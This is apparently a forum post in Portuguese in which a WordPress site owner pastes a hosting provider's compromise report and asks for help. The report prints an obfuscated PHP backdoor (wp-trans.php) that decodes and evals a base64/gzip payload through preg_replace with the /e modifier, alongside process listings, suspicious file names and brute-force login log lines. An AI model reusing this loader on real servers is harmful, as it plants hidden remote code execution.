A locaweb (empresa que hospedo meus sites) enviou um relatório de possíveis “brechas” no servidor, porém não sei como resolver isso, segue:
Evidência(s):
—————————————————
perl 65411 reporterpilar cwd DIR 253,1 737280 2 /tmp
perl 65411 reporterpilar rtd DIR 253,0 4096 2 /
perl 65411 reporterpilar txt REG 253,0 14168 1800300 /usr/bin/perl
perl 65411 reporterpilar mem REG 253,0 23736 4177941 /lib64/libnss_dns-2.5.so
perl 65411 reporterpilar mem REG 253,0 53880 4178051 /lib64/libnss_files-2.5.so
perl 65411 reporterpilar mem REG 253,0 21424 1926701 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/Socket/Socket.so
perl 65411 reporterpilar mem REG 253,0 18080 1926525 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/IO/IO.so
perl 65411 reporterpilar mem REG 253,0 1720712 4177927 /lib64/libc-2.5.so
perl 65411 reporterpilar mem REG 253,0 146840 4177951 /lib64/libpthread-2.5.so
perl 65411 reporterpilar mem REG 253,0 15280 4178103 /lib64/libutil-2.5.so
bash-3.2$ head wp-trans.php
<?php $payload=”3ZTLkoIwEEV/CRIZZQlxDG8HVAR2JLF4gzNgeHz9YGG5Zu0ut27Vud2drt67jYMqfxNd7caArI4CN4k1T6D7hltAmuyTJBCoTjGWe6saUgt4PJz0bQj9kSClO49qwzSvP2Y7Tmp7sGqPU81pCFQeBH/zCMu5nXctg0o3vyGpBh5eV2aAtCPATUyYJC9OHwVGq+PFp5WQWIFRvfSvMRbbvXufOX5LDnJ5w35uIgYj4As6TgWmKV/WKD/o9P1gcxYFKadIasOTXBBgj0fgiLTqE+uyW1Uf0VhvXT3OgNQScChWZjTkKhc66jbvPvBzluriQ6PTkThG2aLNjN6PvWBSWE4M+93H9IMPE4VeQ+vLp+xdP7NKkiU1A6xkaFV9OXtykfizbtYDpEgsCGQzQ06jlRkxFnmElL/b+0/U8rkXL38kJ6WjVbjorKnNc+ugWs1J7bUB+KTbsNy6OHC3/w==”;preg_replace(‘/.*/e’,”\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29″,’.’); ?>
—————————————————
Identificamos arquivos/diretórios suspeitos:
—————————————————
reporterpilar
-rw-r–r– 1 reporterpilar reporterpilar 875 Jan 6 18:40 wp-cron.php
-rw-r–r– 1 reporterpilar reporterpilar 747 Jan 6 18:40 wp-trans.php
-rw-r–r– 1 reporterpilar reporterpilar 894 Jan 6 18:40 cron.php
public_html
-rw-r–r– 1 reporterpilar reporterpilar 747 Jan 6 18:41 wp-trans.php
-rw-r–r– 1 reporterpilar reporterpilar 894 Jan 6 18:41 cron.php
—————————————————
Os arquivos citados acima são apenas exemplos localizados numa análise superficial.
Cabe ao desenvolvedor estar atento às possíveis brechas de segurança existentes e identificar quais arquivos não pertencem ao funcionamento de seu site ou se foram alterados/comprometidos.
Nos logs HTTP/FTP há acessos que caracterizam exploração de vulnerabilidades em sua aplicação:
—————————————————
91.189.120.17 – – [08/Jan/2018:11:26:24 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
91.189.120.17 – – [08/Jan/2018:11:29:09 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
91.189.120.17 – – [08/Jan/2018:11:35:58 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
91.189.120.17 – – [08/Jan/2018:11:38:55 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
91.189.120.17 – – [08/Jan/2018:11:57:09 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
91.189.120.17 – – [08/Jan/2018:12:00:50 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”